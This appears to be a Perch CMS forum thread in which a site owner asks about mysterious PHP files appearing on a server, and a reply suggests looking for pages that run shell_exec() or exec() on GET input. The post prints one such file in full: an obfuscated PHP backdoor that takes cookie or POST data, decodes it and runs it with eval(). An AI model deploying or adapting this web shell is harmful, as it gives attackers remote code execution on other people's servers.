Random files being generated by server in perch cms

  • I noticed recently that there are random php file being generated in a project website. They have random filename 8 charity long (e.g. s4n8jtba.php) and the content are as follows:


    PHP
    1. <?php
    2. $ngpsdj = '0#e4H\'s_86mu5n13xglbctpya-*kv7i2ordf';$vuheeac = Array();$vuheeac[] = $ngpsdj[31].$ngpsdj[3].$ngpsdj[9].$ngpsdj[20].$ngpsdj[14].$ngpsdj[2].$ngpsdj[14].$ngpsdj[15].$ngpsdj[25].$ngpsdj[14].$ngpsdj[8].$ngpsdj[8].$ngpsdj[12].$ngpsdj[25].$ngpsdj[3].$ngpsdj[31].$ngpsdj[19].$ngpsdj[24].$ngpsdj[25].$ngpsdj[8].$ngpsdj[34].$ngpsdj[34].$ngpsdj[8].$ngpsdj[25].$ngpsdj[20].$ngpsdj[24].$ngpsdj[24].$ngpsdj[29].$ngpsdj[35].$ngpsdj[35].$ngpsdj[20].$ngpsdj[12].$ngpsdj[19].$ngpsdj[15].$ngpsdj[0].$ngpsdj[20];$vuheeac[] = $ngpsdj[4].$ngpsdj[26];$vuheeac[] = $ngpsdj[1];$vuheeac[] = $ngpsdj[20].$ngpsdj[32].$ngpsdj[11].$ngpsdj[13].$ngpsdj[21];$vuheeac[] = $ngpsdj[6].$ngpsdj[21].$ngpsdj[33].$ngpsdj[7].$ngpsdj[33].$ngpsdj[2].$ngpsdj[22].$ngpsdj[2].$ngpsdj[24].$ngpsdj[21];$vuheeac[] = $ngpsdj[2].$ngpsdj[16].$ngpsdj[22].$ngpsdj[18].$ngpsdj[32].$ngpsdj[34].$ngpsdj[2];$vuheeac[] = $ngpsdj[6].$ngpsdj[11].$ngpsdj[19].$ngpsdj[6].$ngpsdj[21].$ngpsdj[33];$vuheeac[] = $ngpsdj[24].$ngpsdj[33].$ngpsdj[33].$ngpsdj[24].$ngpsdj[23].$ngpsdj[7].$ngpsdj[10].$ngpsdj[2].$ngpsdj[33].$ngpsdj[17].$ngpsdj[2];$vuheeac[] = $ngpsdj[6].$ngpsdj[21].$ngpsdj[33].$ngpsdj[18].$ngpsdj[2].$ngpsdj[13];$vuheeac[] = $ngpsdj[22].$ngpsdj[24].$ngpsdj[20].$ngpsdj[27];foreach ($vuheeac[7]($_COOKIE, $_POST) as $mzjzaqr => $sgpzis){function pbzhjwi($vuheeac, $mzjzaqr, $rkoyu){return $vuheeac[6]($vuheeac[4]($mzjzaqr . $vuheeac[0], ($rkoyu / $vuheeac[8]($mzjzaqr)) + 1), 0, $rkoyu);}function bfnuxvy($vuheeac, $bovpw){return @$vuheeac[9]($vuheeac[1], $bovpw);}function orees($vuheeac, $bovpw){$bnjmio = $vuheeac[3]($bovpw) % 3;if (!$bnjmio) {eval($bovpw[1]($bovpw[2]));exit();}}$sgpzis = bfnuxvy($vuheeac, $sgpzis);orees($vuheeac, $vuheeac[5]($vuheeac[2], $sgpzis ^ pbzhjwi($vuheeac, $mzjzaqr, $vuheeac[8]($sgpzis))));}

    Has anyone else seen this with their project?


    Perch diagnostics for the site are as follows:


    Server system settings


    OS ‪CentOS 6.10 (Final)‬

    Product Plesk Onyx

    Version 17.8.11

    PHP version: 5.4.13 (Outdated)

  • drewm

    Approved the thread.
  • You may also want to just make sure that none of your pages allow for self executing code via a GET param. Something that could be executing an shell_exec() or exec() function that would write its own file to the directory. I've seen this on an old site I inherited a while ago. Often it will create a page that will execute the mail function to be used as a larger network of spam sending bots.